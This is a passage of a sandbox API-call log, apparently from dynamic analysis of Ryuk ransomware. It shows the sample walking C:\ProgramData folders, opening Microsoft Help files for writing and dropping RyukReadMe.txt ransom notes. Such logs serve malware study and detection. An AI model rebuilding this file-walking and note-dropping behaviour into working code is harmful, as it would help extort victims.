dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.768] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.768] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.768] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.768] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.768] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.768] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.769] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.769] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.769] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.769] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.769] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.769] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.769] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.769] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.769] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.769] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.770] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.770] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.770] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.770] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.770] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.770] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.770] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.770] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.770] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.770] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.770] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.771] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.771] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.771] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.771] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.771] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.771] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.771] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.771] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.772] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.772] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.772] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.772] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.772] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.772] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.772] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.773] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.773] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.773] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.773] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.773] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.774] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.774] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.774] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.774] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.774] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.774] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.774] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.774] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.774] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.775] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.775] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.775] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.775] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.775] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.775] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.775] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.775] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.775] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.776] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.776] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.776] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.776] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.776] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.776] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.776] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.777] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.777] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.777] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.777] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.777] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.777] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.777] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.777] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.777] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.777] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.777] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.778] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.778] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.778] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.778] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.778] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.778] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.779] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.779] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.779] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.779] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.779] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.779] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.779] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.779] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.779] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.779] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.779] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.780] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.781] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.781] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.782] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.782] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.782] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.782] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.782] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.782] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.782] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.782] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.782] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.782] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0140.783] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.783] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.783] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.783] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.783] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.783] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\nslist.hxl", dwFileAttributes=0x80) returned 0 [0140.783] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.783] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.783] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.783] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0140.783] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0140.784] SetLastError (dwErrCode=0x0) [0140.784] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft help\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.787] GetLastError () returned 0x5 [0140.787] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0140.787] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.787] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0140.787] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0140.787] SetLastError (dwErrCode=0x0) [0140.787] CreateFileW (lpFileName="C:\\ProgramData\\RyukReadMe.txt" (normalized: "c:\\programdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.787] GetLastError () returned 0xb7 [0140.787] CloseHandle (hObject=0x180) returned 1 [0140.787] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d60 [0140.787] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.787] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0140.787] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0140.787] SetLastError (dwErrCode=0x0) [0140.787] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\RyukReadMe.txt" (normalized: "c:\\programdata\\oracle\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.788] GetLastError () returned 0x0 [0140.788] WriteFile (in: hFile=0x180, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ae150*=0x320, lpOverlapped=0x0) returned 1 [0140.788] CloseHandle (hObject=0x180) returned 1 [0140.789] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0140.789] SetLastError (dwErrCode=0x0) [0140.789] CreateFileW (lpFileName="C:\\ProgramData\\RyukReadMe.txt" (normalized: "c:\\programdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.789] GetLastError () returned 0xb7 [0140.789] CloseHandle (hObject=0x180) returned 1 [0140.789] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d60 [0140.791] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.791] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.791] SetLastError (dwErrCode=0x0) [0140.791] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.791] GetLastError () returned 0x5 [0140.791] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.791] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.791] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.792] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.792] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.792] SetLastError (dwErrCode=0x0) [0140.792] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.792] GetLastError () returned 0x5 [0140.792] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.792] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.792] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.792] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.792] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.792] SetLastError (dwErrCode=0x0) [0140.792] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.792] GetLastError () returned 0x5 [0140.792] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.792] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.792] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.792] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.792] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.792] SetLastError (dwErrCode=0x0) [0140.792] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.793] GetLastError () returned 0x5 [0140.793] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0140.793] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.793] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0140.793] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.793] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: 